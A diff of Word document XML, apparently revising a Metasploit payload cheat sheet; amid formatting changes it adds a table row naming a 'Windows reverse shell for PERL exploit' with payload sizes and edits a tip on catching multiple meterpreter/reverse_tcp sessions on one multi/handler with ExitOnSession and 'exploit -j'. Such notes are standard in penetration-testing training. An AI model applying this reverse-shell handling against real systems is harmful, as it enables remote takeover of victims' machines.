+              <w:t>perl</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Windows reverse shell for PERL exploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>324</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2688,7 +3491,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
+            <w:tcW w:w="3060" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2734,11 +3537,33 @@
             <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>351</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
       </w:tr>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2869,7 +3694,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
+            <w:tcW w:w="3060" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2900,14 +3725,34 @@
             <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>346</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
       </w:tr>
-      <w:bookmarkEnd w:id="0"/>
     </w:tbl>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:spacing w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="atLeast"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="180" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="424949"/>
@@ -2915,6 +3760,16 @@
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="424949"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -2945,76 +3800,44 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:br/>
+      </w:r>
+      <w:r>
         <w:t>T</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="424949"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
         <w:t xml:space="preserve">o get multiple session on a single multi/handler, you need to set the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="424949"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
         <w:t>ExitOnSession</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="424949"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> option to false and run the exploit -j instead of just the exploit. For example, for </w:t>
+        <w:t xml:space="preserve"> option to false and run the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> exploit -j instead of just the </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:t xml:space="preserve">exploit. For example, for </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="424949"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
         <w:t>meterpreter</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="424949"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="424949"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
         <w:t>reverse_tcp</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="424949"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> payload,</w:t>
+        <w:t xml:space="preserve"> payload:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3353,7 +4176,16 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt; set </w:t>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
+          <w:color w:val="404040"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">set </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
